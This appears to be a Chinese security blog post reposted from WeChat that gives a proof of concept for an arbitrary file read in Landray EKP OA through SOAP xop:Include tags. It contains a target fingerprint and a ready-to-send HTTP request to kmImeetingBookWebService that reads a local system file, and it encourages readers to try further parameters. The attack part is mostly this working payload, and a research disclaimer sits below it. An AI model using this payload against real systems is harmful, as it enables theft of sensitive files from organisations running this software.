蓝凌OA任意文件读取(在野) POC

2025年1月11日11:20:35评论6 views字数 1863阅读6分12秒阅读模式

0x02 简介

蓝凌EKP由深圳市蓝凌软件股份有限公司自主研发，是一款全程在线数字化OA，应用于大中型企业在线化办公，包含流程管理、知识管理、会议管理、公文管理等等。蓝凌0A的thirdImSyncForKKWebService接口存在任意文件读取漏洞。攻击者可利用漏洞获取系统敏感信息。

0x03 指纹信息

web.icon=="302464c3f6207d57240649926cfc7bd4"

0x04 漏洞复现

在上一篇文章中分析说了任意文件读取接口不止那一处，因为他造成任意文件读取的不是像我们之前常见的filename，path，url这种。而是触发漏洞的是soap中包含了xop:Include标签，也就是我可以在poc中的任意位置插入paylaod。

SOAP 的 XOP 扩展：

SOAP 的 XOP 扩展：xop:Include 是 SOAP 附件优化机制（XML-binary Optimized Packaging）。如果服务器端 SOAP 框架支持 XOP，并未禁用 file:// 协议，它可能会尝试解析 href 指向的文件内容。触发条件：如果服务器端解析 SOAP 的 type 字段时，遇到 xop:Include 的 href 属性，会调用底层的 URI 解析方法（如 new URL().openStream()），加载指定文件。

那么还有另外的几个webservice接口中也是存在任意文件读取漏洞的。kmImeetingBookWebService接口，触发漏洞的参数是count，其实也就是说在任意的service接口中带有count参数或者type参数都能够触发漏洞。回显还是正常的base64数据需要解密就能或者到数据了。

漏洞payload

POST /sys/webservice/kmImeetingBookWebService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SESSION=MmM1ZWZjYWQtZDQ1Mi00NWU3LWI4ZmMtNmQwY2UyYWRkNzEzConnection: close closeContent-Type: multipart/related; boundary=----oxmmdmlnvlx08yluof5qSOAPAction: Content-Type: text/xml;charset=UTF-8Host: Content-Length: 597------oxmmdmlnvlx08yluof5qContent-Disposition: form-data; name="111"<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:web="http://webservice.imeeting.km.kmss.landray.com/"><soapenv:Header/><soapenv:Body><web:getImeetingBook><arg0><!--type: string--><count><xop:Includexmlns:xop="http://www.w3.org/2004/08/xop/include"href="file:///C:WindowsSystem32driversetchosts"/></count></arg0></web:getImeetingBook></soapenv:Body></soapenv:Envelope>------oxmmdmlnvlx08yluof5q--

其实还有好几个参数都存在大家可以去试试

原文始发于微信公众号（实战安全研究）：蓝凌OA任意文件读取(在野)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

蓝凌OA任意文件读取(在野) POC

WordPress ltl-freight-quotes-estes-edition sql注入(CVE-2024-13488)

WordPress R+L Carrier Edition sql注入漏洞(CVE-2024-13481)

Metasploit 利用CVE-2025-24071（NTLM Hash Leak via .library-ms File）

【高危漏洞预警】ollama 0.1.37 ZipSlip远程代码执行漏洞

Sitecore反序列化漏洞

亿华人力资源管理系统任意文件上传漏洞

JEEWMS SQL注入漏洞

Koha CVE-2025-22954：lateissues-export.pl SQL 注入

金中智慧养老管理平台任意文件上传漏洞

Ganglia Web Interface XSS漏洞

发表评论

在线咨询

微信